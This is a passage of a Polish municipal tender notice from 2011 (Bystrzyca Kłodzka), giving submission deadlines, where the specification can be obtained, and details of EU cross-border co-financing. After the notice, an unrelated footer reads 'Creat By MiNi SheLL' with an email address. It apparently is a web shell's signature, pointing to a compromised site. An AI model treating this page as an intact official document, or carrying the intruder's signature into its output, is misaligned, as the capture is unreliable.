3. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie.

4 Bezwzględnym warunkiem zmiany terminu umowy jest zgoda instytucji dofinansowującej zadanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-bystrzycaklodzka.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, Wydział Turystyki, Mały Rynek 2/1 , 57-500 Bystrzyca Kłodzka, w godz.: 8:00 - 16:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2011 godzina 09:30, miejsce: Urząd Miasta i Gminy w Bystrzycy Kłodzkiej, ul. Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, pokój nr 9 (Sekretariat). Otwarcie ofert: 15.04.2011 r. w UMiG w Bystrzycy Kł., w pok. nr 8, o godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalne w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007 -2013  oraz budżetu państwa za pośrednictwem Euroregionu Glacensis..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com